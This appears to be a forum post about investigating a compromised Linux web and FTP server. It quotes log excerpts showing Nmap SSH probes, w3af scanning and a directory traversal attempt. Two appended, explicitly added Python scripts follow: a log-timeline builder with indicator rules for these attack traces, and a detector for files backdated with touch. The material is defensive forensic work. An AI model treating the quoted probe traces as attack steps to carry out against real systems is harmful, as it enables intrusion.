Apr 12 11:38:56 ServerGroep1 sshd[3092]: Did not receive identification string from 10.13.37.10
Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session opened for user root by (uid=0)
Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session closed for user root
Apr 12 11:44:13 ServerGroep1 sshd[3139]: Did not receive identification string from 10.13.37.10
Apr 12 11:44:21 ServerGroep1 sshd[3143]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
Apr 12 11:44:21 ServerGroep1 sshd[3145]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:57:24 ServerGroep1 sshd[3205]: Accepted password for root from 10.0.0.10 port 54049 ssh2
==============
What we think we know:
- A user “cees” has been added to both the passwd and shadow file
- The account leo has been used to gain FTP access
- evil.host and cc4u.lan are malicious hosts.
- The IPs 10.0.0.14 and 10.13.37.10 are suspicious at least
- There have been several attempts to find vulnerabilities in the website
- A hacker framework has been used to find vulnerabilities
- A bash script in leo’s folder contains very suspicious information. For example, the touch command was used to alter timestamps.
- The suspicious activities start on April 12, 2010
Questions remaining..
- The exact number of hackers is unknown.
- The identity of the hackers is unknown.
- Can we still trust our timestamps since we know the touch command has been used?
- When was the first server access? And how did they gain access in the first place?
Could you please advise on how to investigate this issue more thoroughly?
Help is much appreciated.
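An added example, not code from the original post and not one of the tools the poster mentions: the evidence above is spread over four logs with three different timestamp formats, and the question "when was the first access, and from where" is easiest to answer from a single timeline keyed by client IP. The script below parses Apache access and error lines, proftpd.log and auth.log lines into one sorted list, tags the patterns that are visible in the post (w3af user-agent, FrontPage probe, traversal/transfer-encoding fuzzing, Nmap SSH banners, unknown FTP users, oversized FTP commands, successful FTP and SSH logins, console root login) and summarises first/last seen per IP. Assumptions: syslog-style lines carry no year, so 2010 is taken from the Apache timestamps; all logs are assumed to be in the same local time, so the Apache "+0200" offset is dropped rather than converted; the indicator rules are illustrative, not a complete detection set. The sample lines are quoted from the post.

```python
import re
from collections import Counter
from datetime import datetime
from typing import List, NamedTuple, Optional

YEAR = 2010  # assumption: syslog-style lines (proftpd.log, auth.log) omit the year
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
ERROR_RE = re.compile(r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$')
SYSLOG_RE = re.compile(r'^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<prog>[\w-]+)\[\d+\]:? ?(?P<msg>.*)$')
IPV4_RE = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3})\b')

RULES = [  # (source, lowercase substring, indicator); illustrative, built from patterns in the post
    ('apache-access', 'w3af', 'web scanner user-agent (w3af)'),
    ('apache-access', '_vti_bin', 'FrontPage extension probe'),
    ('apache-error', 'transfer-encoding', 'protocol fuzzing'),
    ('apache-error', 'uri too long', 'protocol fuzzing'),
    ('apache-error', '/../', 'directory traversal attempt'),
    ('sshd', 'nmap', 'nmap SSH probe'),
    ('sshd', 'accepted password for', 'successful SSH password login'),
    ('proftpd', 'no such user', 'FTP login with unknown user'),
    ('proftpd', 'too-long command', 'oversized FTP command (fuzzing)'),
    ('proftpd', 'login successful', 'successful FTP login'),
    ('login', 'root login', 'root login on local console'),
]

class Event(NamedTuple):
    ts: datetime
    source: str               # apache-access, apache-error, proftpd, sshd, login, cron, ...
    ip: Optional[str]         # None when the line names no client address
    detail: str
    indicator: Optional[str]  # None when the line is not interesting on its own

def classify(source: str, text: str) -> Optional[str]:
    """First RULES entry whose source matches and whose substring occurs in the line, else None."""
    t = text.lower()
    return next((label for src, needle, label in RULES if src == source and needle in t), None)

def parse_line(line: str) -> Optional[Event]:
    """Parse one Apache access, Apache error or syslog-style line; None if no pattern fits."""
    line = line.rstrip('\n')
    m = ACCESS_RE.match(line)
    if m:
        ts = datetime.strptime(m['ts'].split()[0], '%d/%b/%Y:%H:%M:%S')  # "+0200" dropped (assumption)
        detail = f'{m["req"]} -> {m["status"]} ua={m["ua"]}'
        return Event(ts, 'apache-access', m['ip'], detail, classify('apache-access', detail))
    m = ERROR_RE.match(line)
    if m:
        ts = datetime.strptime(m['ts'], '%a %b %d %H:%M:%S %Y')
        return Event(ts, 'apache-error', m['ip'], m['msg'], classify('apache-error', m['msg']))
    m = SYSLOG_RE.match(line)
    if m:
        ts = datetime.strptime(re.sub(r' +', ' ', m['ts']), '%b %d %H:%M:%S').replace(year=YEAR)
        ipm = IPV4_RE.search(m['msg'])          # first IPv4 in the message, also inside ::ffff: forms
        source = m['prog'].lower()
        return Event(ts, source, ipm.group(1) if ipm else None, m['msg'], classify(source, m['msg']))
    return None

def build_timeline(lines: List[str]):
    """Return (events sorted by time, number of lines no pattern matched, e.g. the binary GET junk)."""
    events = [ev for ev in map(parse_line, lines) if ev is not None]
    events.sort(key=lambda e: e.ts)
    return events, len(lines) - len(events)

def summarize_by_ip(events: List[Event]) -> dict:
    """Per client IP: first/last seen, which logs it appears in, and indicator counts."""
    summary = {}
    for ev in events:
        if ev.ip is None:
            continue
        s = summary.setdefault(ev.ip, {'first': ev.ts, 'last': ev.ts, 'sources': set(), 'indicators': Counter()})
        s['first'], s['last'] = min(s['first'], ev.ts), max(s['last'], ev.ts)
        s['sources'].add(ev.source)
        if ev.indicator:
            s['indicators'][ev.indicator] += 1
    return summary

# Lines quoted from the post (access.log, error.log, proftpd.log, auth.log); not constructed.
SAMPLE_LINES = [
    '10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"',
    '10.13.37.10 - - [12/Apr/2010:11:38:56 +0200] "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 339 "-" "-"',
    '[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] Invalid URI in request HEAD /../../../../../ HTTP/1.0',
    'Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21',
    'Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring',
    'Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): USER leo: Login successful.',
    "Apr 12 11:36:59 ServerGroep1 login[3062]: ROOT LOGIN on 'tty1'",
    'Apr 12 11:28:28 ServerGroep1 sshd[2996]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey',
    'Apr 12 11:57:24 ServerGroep1 sshd[3205]: Accepted password for root from 10.0.0.10 port 54049 ssh2',
]

if __name__ == '__main__':
    events, skipped = build_timeline(SAMPLE_LINES)
    for ev in events:
        print(f'{ev.ts:%Y-%m-%d %H:%M:%S} {ev.source:<14} {ev.ip or "-":<13} {ev.indicator or ""}')
    for ip, s in sorted(summarize_by_ip(events).items()):
        print(f'{ip}: {s["first"]:%H:%M:%S}..{s["last"]:%H:%M:%S} in {sorted(s["sources"])} {dict(s["indicators"])}')
    print('unparsed lines:', skipped)
```

Feed it the full logs (`build_timeline(open('/mnt/evidence/var/log/auth.log').readlines())` and so on, concatenated) rather than the sample; the per-IP summary then answers "first access from where" directly, and the unparsed count tells you how many lines the regexes could not read so that nothing is silently dropped. Note that the root SSH login at 11:57:24 comes from 10.0.0.10, not from either host already on the suspect list, which is exactly the kind of gap a merged timeline exposes.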
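A second added example, again not from the original post, for the question whether the timestamps can still be trusted after `touch` was used. `touch` (and the utime(2) call behind it) can set a file's atime and mtime to any value, but the inode change time, ctime, is written by the kernel from the current clock on every inode change and cannot be set through that interface. A file whose mtime lies well before its ctime was therefore either backdated, or had its owner, mode, name or link count changed after its last content write; either way it deserves a look. The walk below reports such files; the demo tree is constructed in a temp directory so that nothing in the evidence is touched. Caveats a practitioner would add: run it against the image mounted read-only (`mount -o ro,noatime`), never on the live box, since reading files on a normally mounted filesystem updates atimes; and ctime itself can be forged by setting the system clock before touching, or by writing to the inode directly, so a clean ctime/mtime pair is not proof either way, only a lead.

```python
import os
import shutil
import stat
import tempfile
import time
from typing import List, Tuple

DEFAULT_GAP = 60.0  # seconds; report files whose mtime is older than their ctime by more than this


def backdated_files(root: str, gap: float = DEFAULT_GAP) -> List[Tuple[str, float, float]]:
    """Walk `root` (symlinks not followed) and return (path, mtime, ctime) for every regular
    file whose mtime lies more than `gap` seconds before its ctime. utime/touch can move mtime
    anywhere, but the kernel sets ctime from the current clock on every inode change, so an
    mtime far behind ctime means the file was backdated or its metadata changed later."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; keep walking
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_ctime - st.st_mtime > gap:
                hits.append((path, st.st_mtime, st.st_ctime))
    return hits


def make_demo_tree() -> str:
    """Constructed sample tree (not evidence from the case): two files, one of them backdated
    with os.utime the same way `touch -t 201001010000 defaced.html` would do it."""
    root = tempfile.mkdtemp(prefix='ctime-demo-')
    for name in ('index.html', 'defaced.html'):
        with open(os.path.join(root, name), 'w') as fh:
            fh.write('<html>sample</html>\n')
    month_ago = time.time() - 30 * 24 * 3600
    os.utime(os.path.join(root, 'defaced.html'), (month_ago, month_ago))  # ctime still jumps to now
    return root


def demo() -> List[str]:
    """Build the constructed tree, return the basenames flagged as backdated, then clean up."""
    root = make_demo_tree()
    try:
        return [os.path.basename(p) for p, _m, _c in backdated_files(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:  # e.g. python3 ctime_check.py /mnt/evidence/var/www  (image mounted ro,noatime)
        for path, mtime, ctime in backdated_files(sys.argv[1]):
            print(f'{path}\n    mtime {time.ctime(mtime)}\n    ctime {time.ctime(ctime)}')
    else:
        print('backdated in demo tree:', demo())
```

Pointing this at `/var/www` on the image should surface the defaced index page and anything the bash script in leo's folder touched; compare the ctimes it reports with the proftpd and auth.log timeline, since a ctime inside the 11:28-12:44 window on April 12 ties the file change to the sessions already in the logs. Autopsy shows the same M/A/C triple per file, so the two views can be cross-checked.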